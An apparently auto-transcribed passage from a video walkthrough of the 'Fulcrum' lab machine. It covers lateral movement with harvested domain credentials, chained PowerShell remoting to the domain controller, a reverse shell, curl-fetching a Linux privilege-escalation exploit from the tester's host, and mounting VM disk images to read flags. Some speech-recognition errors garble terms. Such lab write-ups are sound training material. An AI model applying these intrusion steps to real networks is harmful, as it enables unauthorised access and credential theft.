policy works, you get a bunch of PowerShell scripts. And these PowerShell scripts are a bunch of credentials, user and pass. So let us find the one that has, let's see, what was that account name? We want 923A, because that is one that has logged in. So let's take a look for that file. So let's do git child item dash, we can probably just do stir.ps1, then select string, is it 923A, select object, unique, path. Is that going to do it? It's taken an awful long time. Hopefully I didn't just do something stupid. PowerShell, you can do something stupid quite easily. Shouldn't take that long. Let's see. We'll go to, should be here. So if we do pwsh, should be able to run that on my Kali box. did not work. Let's see. Go back to Cherry Tree. 923A. I didn't do the telemetry. We'll just be quick. Get child item. We'll try recurse stir.ps1. Select string 923A. Select object unique. Nope, that's not going to work. So let's see. Let's go Google. PowerShell find file that contains string. Let's see. Find string in all files. Try this. Oh, it found something. I wonder if that's just broken on Linux. Let's see what this file is. Type 923A is in the password. That's cute. Let's try this one. 923A. So let's try this. Let's see. Let's save this and we'll exit this shell and then try domain controller. So let's see. Copy. Say that. Fulcrum. (923A). Should be good. Exit. This one port 53 again. Go to web. And let us slightly change this. So we want to copy invoke command for everything up to DC. And then see if we can run code on the domain controller. This is what I want. DC. There we go. Paste. Did not like something. Missing closing. Invoke command dash computer DC fulcrum.local credential cred script block. And we'll just paste it again. Dub cat this one-liner. Make sure we don't get the end of line character. We're listening. Paste. Let's see. I don't know why it now says unexpected. See, this is the one that worked before. And that's not working anymore. Vim temp. Let's see what this looks like. That should be good. Let's copy all this. Paste. cred. We got that. Invoke command computer dc.fulcrum.local dash credential cred script block. Who am I? Aired out. So let's type this all again. And I think I just realized the mistake. I wasn't doing this as 923A. Sec pass, convert to secure string. The password is something. I forgot to do this piece. It just wasn't a good error message to tell me it was an authentication failure. At least that's what I'm going to go with. And this is going to work. Cred, new object, system management, automation, credential, 923A. Okay. Now we can invoke command computer dc fulcrum local credential cred script block. Who am I? Does not like that. Let's see. I bet it is PSExec. And that's why PSExec is here. Let's see. CD documents. Let's do testnet connection on. How do we do this? Dash computer name 1010. No. DC Fulcrum local dash port 5986. Doesn't look like I can get to that port. So we definitely can't do this Windows remoting thing again. So let us just try a net use. So DC Fulcrum local slash we can do NetLogon, it's fine. Or we could probably just do $, because this user should be a domain admin from the domain user's output. Slash user Fulcrum 923A, and then the password. And I forgot to specify a drive letter. But we can't mount it anyways. So the issue is shoot. This web server can't reach the domain controller on specific ports. So we got to go back in to the file server. And it's a bit of a pain because I think only DNS can get out. So I wonder if we can chain invoke commands. So let's see. We have to do 2 passwords. So cred isn't anyone right now. So let's do sec pass is equal to convert to secure string. And this has to be the file server. btables. Plain text force. Then we can do cred is equal to new object automation credential Fulcrum B tables. That should be fine. Sec pass. Cred. Cred. Let's do B tables is equal to cred. And let's test this. Invoke command. Computer name file dot fulcrum dot local dash credential B tables script block. Who am I? So right now I'm just testing that these credentials are correct, and I can log in there. And now we got to do the same thing, but for 923A. So his password was this, as plain text, force. I need the $sign. There we go. (923A). And we'll do this as DA. Okay, so we got the credentials set away. Let us start typing this in bash. So we definitely need this. So let's see. We want to do invoke command, computer name, file dot, let's see, fulcrum dot local, and we want to do dash credentials, B tables, and script block is equal to invoke command dash computer name dc.fulcrum.local dash credentials da dash script block. There's no way this is going to work. Paste. Exit that. Exit that. Before we do this, just want to do one last thing. What is it? Invoke command test. Okay. And I'm testing if it's going to process that variable on the web server or the file server. And it looks like it's going to process it on the file server. So I wonder if I escape it. And that just crashed. Copy this. Let's see. If I can just put these in this bash script. Let's see. I should have prepared for this video a bit more. At this point, I think I had used Metasploit when the box came out. So let's see. Three. Cred is the second thing we need. We can call it DA, so we don't have to edit the shell. I said we can call it DA, and yet I typed cred. DA. Maybe? If I'm extremely lucky, that'll work. And I don't think I'm extremely lucky right now. I don't know I'm copying yet. We need to do this, but with the btables password. I think my best move was putting stuff in cherry tree so I can quickly refer to it. This is why I had done that. Potential. Okay, so now we should be able to invoke command again on the file server. File.fulcrum.local credential cred. I think I have credentials in my bash. I should remember to change that. Script block, who am I, hostname. Should do 2 commands. Okay, that is good. 5. Yes, I do have credentials. Here comes the moment of truth. Is that going to work? It is not. Let's see. What did error? Credentials. I typed it twice. And this is now just cred, I think. And we crashed WinRM. Let's see. I'm going to think about this a little bit to see how we can do this double hop. I'm going to clean this up because this is unreadable. So let's see if I made a mistake there. Unscrew, I guess. Paste. And let's see. Get the credential. I see an error already. Tried to do too much at once. Okay. Okay, so this is what it looks like. Invoke command, file, fulcrum local, credentials cred, that looks good. Secpass is equal to convert to secure string, that looks good. That DA now looks good. That looks good. That looks good. Okay, I think it's just that double equals. So let's go back to bash and get rid of that. Oh, I don't know what I'm copying because we have to redo our stupid credentials. Tables. You know, I should have done this at the beginning. Yep. That's not what I wanted first. Well, first I gotta get into WinRM. Then I can copy the password first. Tables. Grab the credential. I meant to put that all in one line, but I always hit enter. It's okay. This is going to work this time. There's only so many times you can make a mistake. Let's see. Credentials cred. DA is 1. Did an error. There we go. Host name. Host name. DC. There we go. Finally, we are on the domain controller. Let's see. Maybe administrator. There's root.txt. And that is Fulcrum. But that's probably been, I don't know, an hour or two, maybe. And we're going to go back a bunch and just instant parent this machine with an unintended privesc because we're running in the DMZ right away. So, the user flag somewhere. I didn't show it. I just realized that. I don't know where the user flag exactly is. It's somewhere, your domain admin, so it's up to you to find the user flag if you want it. I'm guessing it's in like the file server, if I had to guess. That was the next hop after that. So cleaning up all my shells. Let's see. All we need to do is get a reverse shell. One of these is SSH somewhere, unless I just closed that, because I had that reverse connection. Okay, is it HTTP? Starting server. Oh, DMZ is zoomed. There we go. And this was screen, so I can do Control AC, go to new window, and here we go. We are on Fulcrum, and this is that very first hop, the XXE thing. So what we're going to do is, let's do Linux exploit suggester. So Linux exploit suggester. Go to a few of these and just get the one that's been updated the latest. Let's see. 2014. Heck no. 2 months ago. Maybe it's Perl though. 27 days ago. I guess this may be close enough. I thought there was one that was sooner, but we'll try this one. So if we just go back to HTTP, get clone, CP. This is definitely not the latest. It was les.sh. We'll see if it's here. Okay. Start on port 80. Curl 10, 10, 14, 30. And we got some. So we can just go through these exploits and see if any stick out. Rational love, that says Debian, Debian, Debian. Those may work, but they may require some type of editing. And those are all the ones it says. Stack Clash I've never really had that much luck with. This Legal Hackers one I think requires like write access to something. Root depends on cron daily. That's just fake. Pi stack corruption. I don't think I'd have luck there. So we don't have any there. Let's go back and see if we can find what I was looking for. GitHub, les.sh, Linux exploit. Let's see. Let's go back to the one that we were at. MZ fork. Any forks here? Let's go to C. Morris. Looks like he's the latest. Or maybe this chap guy is. We'll try them both. No, I want C. Morris. Go here. Let's see. This may be it. Nope, 20 days ago. What's that other one at? Well, you can tell I didn't prepare this piece of the video that well. I thought I would have found it instantly. Let's see. Two days ago. This is what I was looking for, I think. Let's see. Clone. Copy that. Still not less.sh, but that may be better. Let's see. Curl 10, 10, 14, 30. Let's see. Anything different in this one? No. Let's see. If I can just Google Ubuntu Berkeley. Exploit, maybe? I think this is it. Yep. Ubuntu 16.044 exploit. So I think that's what I searched for, is Ubuntu privexx. So let's see. Let's copy this. I know one of these exploit suggesters can find it. There's just hundreds of them. And did I literally just close? Oh no, I'm on screen. Thank God. I thought I closed my shell. search exploit. Let's see if we can find that. Then we can do search exploit -m to mirror. Then GCC to compile. And then we can call that file down. Where are we? Let's go to temp. Curl 10.10.14.30/exploit. Please subscribe. 10.10.14.30. Connection refused. I didn't set up simple HTTP server. chmod +x. And we are now root. So what can root do? If we grep for DC, we can now go into, where is it? The VMDK directory, virlib libvirt images dc.vmdk. And we can run qemu -r-c dev nbd1 and then the VMDK file. So we'll do DC. It didn't exist, so let's do modprobe nbd. Then try that again. Okay. Now we can mount dev nbd1 p1, so partition 1 and /mount. It's the boot manager umount. Let's do 2. Okay. Users, administrator, desktop, and you got root.txt there. Let's see. Let's check the file server real quick while we're at it. umount/mount. We want user that's the directory we want. We do nbd2 on, or do file. Then mount dev nbd2 p2 probably. CD users. So many users. Find.-name user.txt. There we go. It's in the btables directory. So it is on the file server. I was right. Let's see. 34. So something else is in root.txt other than the hash, because that was 70 characters long and this is just 34. Probably just a congratulations message, but that is Fulcrum. Hope you guys enjoyed the box and could actually follow this video. I know it was probably long and confusing and I made a lot of errors, but this is a tough box. So, hope you guys enjoyed. Take care. See you next week.